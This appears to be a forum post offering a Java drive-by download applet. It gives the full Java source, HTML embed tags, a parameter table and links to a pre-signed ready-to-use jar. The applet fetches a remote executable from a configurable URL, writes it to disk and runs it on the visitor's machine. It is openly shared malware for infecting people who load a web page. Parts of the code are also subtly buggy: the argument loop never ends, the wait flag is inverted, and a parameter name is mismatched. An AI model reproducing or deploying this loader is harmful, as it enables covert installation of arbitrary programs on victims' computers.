I originally wrote up this one-size-fits-all Java Driveby for you guys since there was a large response to that basic one posted earlier. It includes many useful arguments that can make it adapt to pertty much any situation. This one has been updated upon request from the previous version to fix some bugs and include new features. If it's missing something you need just post here and I'll include it. When debugging is enabled, it prints almost every step of the process.

Parameters: (These were organized with tabs but the forum killed them..)

Code:
    KEY        TYPE        DEFAULT        DESCRIPTION
-    debug        boolean    false        if the program should print debugging information
-    remfile        string        null        remote url of the file to download
-    locfile            string        temp        where to store the file (blank is temporary files)
-    buffsize        int        8192        download/write buffer size
-    workdir        string        current    the directory (environment) in which the file will execute
-    waitfor        boolean    true        wait on the program to finish and print result value

Arguments:
To supply an argument to your program, you must enter parameters as follows:
Code:
<param name="arg1" value="the argument">
<param name="arg2" value="the argument">
<param name="arg3" value="the argument">

You may supply as many arguments as you wish, but their respective numbers must be sequential. The program stops parsing arguments when a null argument is reached.

Heres the full applet code: (You will need to adjust the parameters to your needs)

Code:
<applet archive=JavaDriveBy.jar code=jdriveby.JDriveBy>
<param name="debug" value="true">
<param name="remfile" value="http://yoursite.com/yourprogram.exe">
<param name="locfile" value="C:/myfile.exe">
<param name="buffsize" value="8192">
<param name="workdir" value="c:/minecraft/userdata">
<param name="waitfor" value="true">
</applet>

Heres a more basic one:
Code:
<applet archive=JavaDriveBy.jar code=jdriveby.JDriveBy>
<param name="remfile" value="http://yoursite.com/yourprogram.exe">
</applet>

Pre-signed ready to go .jar: (ADF-LY)
Uppit: http://adf.ly/2iM5D
Mediafire: http://adf.ly/2iM8O
Megaupload: http://adf.ly/2iMAU

Source code:

Code:
package jdriveby;

import java.applet.Applet;
import java.io.File;
import java.io.FileOutputStream;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.URL;
import java.util.LinkedList;
import java.util.List;

/**
* @author Colby
*/
public class JDriveBy extends Applet {

    private boolean debug;

    @Override
    public void init() {
  logln("init");
  debug = Boolean.parseBoolean(getParameter("debug"));
  logln("debug? " + debug);
    }

    @Override
    public void start() {
  logln("start");
  try {
    URL fileURL = new URL(getParameter("remfile"));
    logln("remfile \"" + fileURL.toString() + "\"");

    String locFilePath = getParameter("locfile");
    File locFile;
    if (locFilePath != null) {
    locFile = new File(locFilePath);

    } else {
    String file = fileURL.getFile();
    String fileName = file.substring(file.lastIndexOf('/') + 1, file.lastIndexOf('.'));
    String fileExt = file.substring(file.lastIndexOf('.') + 1);
    locFile = File.createTempFile(fileName, fileExt);
    }

    log("locfile \"" + locFile.getAbsolutePath() + "\" ");
    logln("R: " + locFile.canRead() + " W: " + locFile.canWrite() + " E: " + locFile.canExecute());

    File locDir = new File(
    locFile.getAbsolutePath().substring(0, locFile.getAbsolutePath().lastIndexOf(System.getProperty("file.separator"))));
    log("locdir \"" + locDir.getAbsolutePath() + "\" ");
    logln("mkdirs? " + locDir.mkdirs());

    InputStream in = null;
    try {
    in = fileURL.openStream();
    OutputStream out = null;
    try {
    out = new FileOutputStream(locFile);

    int bufSize = 8192;
    String sizeParam = getParameter("bufsize");
    if (sizeParam != null) {
    bufSize = Integer.parseInt(sizeParam);
    }
    logln("bufsize: " + bufSize);

    byte[] buf = new byte[bufSize];
    for (int len = 0; len != -1; len = in.read(buf)) {
    out.write(buf, 0, len);
    }
    out.flush();

    } finally {
    if (out != null) {
    out.close();
    }
    }

    } finally {
    if (in != null) {
    in.close();
    }
    }

    String arg;
    List<String> args = new LinkedList<String>();
    for (int i = 0; (arg = getParameter("arg") + i) != null; i++) {
    args.add(arg);
    }

    ProcessBuilder pb = new ProcessBuilder(args);

    String workDirPath = getParameter("workdir");
    File workDir = new File(workDirPath);
    if (workDir != null) {
    pb.directory(workDir);
    }
    logln("workdir \"" + workDir.getAbsolutePath() + "\"");

    Process p = pb.start();

    String waitFor = getParameter("waitfor");
    if (waitFor == null || !Boolean.parseBoolean(waitFor)) {
    logln("exit val: " + p.waitFor());
    }

  } catch (Throwable t) {
    report(t);
  }
    }

    private void logln(String s) {
  log(s + System.getProperty("line.separator"));
    }

    private void log(String s) {
  if (debug) {
    System.out.print(s);
  }
    }

    private void report(Throwable t) {
  if (debug) {
    t.printStackTrace();
  }
    }
}



Labels: